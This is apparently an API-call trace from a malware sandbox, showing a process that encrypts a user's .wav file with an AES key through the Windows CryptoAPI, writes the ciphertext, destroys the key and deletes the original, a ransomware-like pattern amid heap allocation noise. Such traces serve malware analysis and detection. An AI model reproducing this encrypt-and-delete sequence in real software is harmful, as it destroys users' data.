[0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0115.513] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0115.513] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0115.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0115.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0115.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0115.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0115.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0115.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0115.516] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e2920, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2920*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0115.516] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.516] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.516] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0115.517] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x13ad5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x13ae0) returned 1 [0115.517] CharLowerBuffW (in: lpsz="byte[80609]", cchLength=0xb | out: lpsz="byte[80609]") returned 0xb [0115.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0115.519] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49adae8*, pdwDataLen=0x144e2e0*=0x13ad5, dwBufLen=0x13ae0 | out: pbData=0x49adae8*, pdwDataLen=0x144e2e0*=0x13ae0) returned 1 [0115.520] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.522] WriteFile (in: hFile=0x258, lpBuffer=0x4529af8*, nNumberOfBytesToWrite=0x13ae0, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x4529af8*, lpNumberOfBytesWritten=0x144ece4*=0x13ae0, lpOverlapped=0x0) returned 1 [0115.524] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0115.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0115.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0115.525] CryptDestroyKey (hKey=0x41ac740) returned 1 [0115.525] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.525] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.525] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0115.525] CryptReleaseContext (hProv=0x41a48c0, dwFlags=0x0) returned 1 [0115.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.525] FreeLibrary (hLibModule=0x756e0000) returned 1 [0115.525] CloseHandle (hObject=0x298) returned 1 [0115.525] CloseHandle (hObject=0x258) returned 1 [0115.532] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav", lpFilePart=0x0) returned 0x40 [0115.532] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\g4kpqwyzsqa5pz.wav")) returned 0x20 [0115.532] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dee1750, ftCreationTime.dwHighDateTime=0x1d5e7db, ftLastAccessTime.dwLowDateTime=0x8f87cd00, ftLastAccessTime.dwHighDateTime=0x1d5ef0e, ftLastWriteTime.dwLowDateTime=0x8f87cd00, ftLastWriteTime.dwHighDateTime=0x1d5ef0e, nFileSizeHigh=0x0, nFileSizeLow=0x13ad5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="g4kPqWyZSQA5pz.wav", cAlternateFileName="G4KPQW~1.WAV")) returned 0x41ac180 [0115.532] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\g4kpqwyzsqa5pz.wav")) returned 1 [0115.572] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dee1750, ftCreationTime.dwHighDateTime=0x1d5e7db, ftLastAccessTime.dwLowDateTime=0x8f87cd00, ftLastAccessTime.dwHighDateTime=0x1d5ef0e, ftLastWriteTime.dwLowDateTime=0x8f87cd00, ftLastWriteTime.dwHighDateTime=0x1d5ef0e, nFileSizeHigh=0x0, nFileSizeLow=0x13ad5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="g4kPqWyZSQA5pz.wav", cAlternateFileName="G4KPQW~1.WAV")) returned 0 [0115.573] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0115.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0115.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0115.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0115.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0115.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0115.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0115.574] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0115.574] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e87e8 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0115.575] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0115.575] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0115.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0115.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0115.575] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0115.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0115.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0115.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0115.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x110) returned 0x43e87e8 [0115.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0115.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0115.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0115.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0115.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0115.577] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0115.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0115.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0115.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.577] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0115.577] 